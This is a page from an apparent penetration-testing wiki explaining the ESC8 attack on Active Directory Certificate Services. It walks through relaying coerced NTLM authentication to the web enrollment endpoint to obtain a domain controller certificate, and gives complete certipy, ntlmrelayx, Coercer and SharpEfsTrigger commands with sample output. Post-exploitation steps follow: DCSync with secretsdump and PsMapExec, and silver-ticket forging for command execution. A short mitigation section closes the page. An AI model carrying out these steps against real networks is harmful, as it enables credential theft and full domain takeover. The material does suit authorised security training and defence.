Pentest Everything
GitHubSupport Pentest Everything
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵PsMapExec
    • Change Log
    • BloodHound
    • Using Credentials
    • Cross Domain Usage
    • Methods
      • Command Execution
      • DCSync
      • GenRelayList / SMB Signing
      • Inject
      • IPMI
      • Kerberoast
      • MSSQL
      • Session Hunter
      • Spray
    • Modules
      • Amnesiac
      • ConsoleHistory
      • Files
      • FileZilla
      • KerbDump
      • eKeys
      • LDAP / LDAPS
      • LogonPasswords
      • LSA
      • MDF
      • NTDS
      • Notepad
      • NTLM
      • SAM
      • SCCM
      • SessionExec
      • SessionRelay
      • SSH
      • TGTDeleg
      • VNC
      • Wi-Fi
      • WinSCP
    • Target Acquisition
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page
  • Description
  • Requirements for attack path
  • Linux
  • Enumeration
  • Performing the attack
  • Post Exploitation
  • DCSync
  • Silver Ticket
  • Windows
  • Enumeration
  • Performing the attack
  • Usage
  • Post Exploitation
  • DCSync
  • Mitigation

Was this helpful?

  1. Everything
  2. Everything Active Directory and Windows
  3. ADCS

ESC8

Last updated 2 months ago

Was this helpful?

Description

ESC8 attacks fall under the category of NTLM relay attacks. Active Directory Certificate Services (AD CS) supports multiple enrollment methods, including HTTP-based enrollment, which enables users to request and obtain certificates over HTTP. The core concept of ESC8 abuse involves coercing authentication from a machine account and relaying it to AD CS to acquire a certificate that permits client authentication.

Since the HTTP protocol does not enforce NTLM signature verification during authentication, if the HTTP enrollment endpoint is enabled, an attacker can obtain NTLM authentication (through techniques like authentication coercion or poisoning), relay it to the AD CS HTTP endpoint, and request a certificate for the authenticated account.

Requirements for attack path

  • vulnerable web enrollment endpoint

  • at least one certificate template that is enabled and allows for domain computer enrollement and client authentication

Generally the default "Machine" account is a valid template for this attack. Additionally, when targeting domain controllers the default "DomainControllers" template is a viable option also.

Linux

Enumeration

certipy find -u 'Moe@Security.local' -p 'Password123' -dc-ip 10.10.10.100 -stdout -vulnerable

Performing the attack

After identifying a vulnerable web enrollment endpoint we can next setup the NTLM relay. We can use either ntlmrelayx or certipy.

In both commands shown below, ensure to select the correct template based on the machine account you are attempting to relay authentication to the web enrollement server for:

  • DomainControllers --> -template DomainController

  • Machine Accounts --> -template Machine

# Certipy, target is the ADCS server
certipy relay -target 10.10.10.2 -template DomainController 

# ntlmrelayx, target is the ADCS server
impacket-ntlmrelayx -t http://10.10.10.2/certsrv/certfnsh.asp -smb2support --adcs --template DomainController 

Once either of the relay listeners is running we can use Coercer to perform forced authentication.

coercer coerce -l 10.10.10.4 -t 10.10.10.2 -d security.local -u moe -p Password123 --always-continue

Once coercion is successful, certipy or ntlmrelayx will both save the certificate file to the current directory.

Output
[*] Targeting http://10.10.10.2/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Requesting certificate for 'SECURITY\\DC01$' based on the template 'DomainController'
[*] Got certificate with DNS Host Name 'DC01.SECURITY.LOCAL'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-1000'
[*] Saved certificate and private key to 'dc01.pfx'

Then use certipy to obtain credentials

certipy auth -pfx DC01$.pfx -dc-ip 10.10.10.100 

Post Exploitation

Various post-exploitation steps can be undertaken after obtaining a machine account hash. The below example will focus on post-exploitation with a Domain Controller hash.

DCSync

A simple approach would be to perform a DCsync with impacket-secretsdump using the domain controller hash obtained from the certificate.

# All data
impacket-secretsdump 'DC01$'@10.10.10.100 -hashes :1fe859c38adaa592ad52559fd9ab584d 

# Single user
impacket-secretsdump 'DC01$'@10.10.10.100 -hashes :1fe859c38adaa592ad52559fd9ab584d -just-dc-user krbtgt

Silver Ticket

As an alternative option we can generate a silver ticket for a particular service such as CIFS and then gain direct command execution over the target, in this case the Domain Controller.

Firstly, identify the domain SID.

impacket-lookupsid 'DC01$'@10.10.10.100 -hashes :1fe859c38adaa592ad52559fd9ab584d | grep 'Domain SID is:' 

Next, we use ticketer to forge a silver ticket for a given service. In this case CIFS over Domain Controller.

impacket-ticketer -nthash 1fe859c38adaa592ad52559fd9ab584d -domain-sid S-1-5-21-13999771-2333344039-1820745628 -domain security.local -spn cifs/dc01.security.local Administrator 

Then export the TGS.

export KRB5CCNAME=Administrator.ccache

Finally, authenticate and issue commands.

nxc smb dc01.security.local --use-kcache -x 'whoami'

Windows

Local administrator rights are required on Windows to perform this attack as SMB traffic needs to be redirected to a non-default port.

Enumeration

Certify does not identify web enrollment endpoints as such, some manual identification should be enough. Browse to the Web Enrollement for the Certificate Authority.

http://ca.security.local/certsrv/certfnsh.asp

If we connect over HTTP and see an authentication form such as that shown below, the endpoint is likely vulnereable to ESC8.

Performing the attack

NTLMrelayx.exe

DivertTCPconn

SharpEFSTrigger

Usage

Configure DivertTCPconn to redirect SMB traffic to port 8445 (Requires Local Admin)

.\divertTCPConn.exe 445 8445

Set up NTLMRelayx and target the Certificate Authority web enrollment point. Ensuring to specify --smb-port 8445.

In the command shown below, ensure to select the correct template based on the machine account you are attempting to relay authentication to the web enrollement server for:

  • DomainControllers --> --template DomainController

  • Machine Accounts --> --template Machine

.\ntlmrelayx.exe --smb-port 8445 -t http://ca.security.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Coerce a Domain Controller to authenticate to the testing host in order to capture the certificate for the Domain Controller

.\SharpEfsTrigger.exe [Target] [Listening-Host] [API Call]
.\SharpEfsTrigger.exe 10.10.10.100 10.10.10.3 EfsRpcEncryptFileSrv

This should capture the certificate of the Domain Controller providing the coercion is successful.

Post Exploitation

DCSync

A simple approach would be to perform a DCsync with PsMapExec using the domain controller TGT obtained from the certificate.

PsMapExec -targets 'dc01' -domain 'security.local' -method 'dcsync' -showoutput -ticket 'doIGRjCCBkKgAwIBBaEDAgEWooI....'

Mitigation

  • Enable EPA for Certificate Authority Web Enrollment

  • Disable NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" services.

URL:

Disable NTLM on any AD CS Servers in your domain using the group policy . To configure this GPO, open Group Policy and go to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options and set Network security: Restrict NTLM: Incoming NTLM traffic to Deny All Accounts or Deny All domain accounts. If needed, you can add exceptions as necessary using the setting .

https://github.com/The-Viper-One/RedTeam-Binaries/blob/main/ntlmrelayx.exe
https://gith
ub.com/Arno0x/DivertTCPconn/tree/master/compiled_binaries/Binaries_x64
https://github.com/The-Viper-One/RedTeam-Pentest-Tools/blob/main/Coercion/SharpEfsTrigger.exe
https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429
Network security: Restrict NTLM: Incoming NTLM traffic
Network security: Restrict NTLM: Add server exceptions in this domain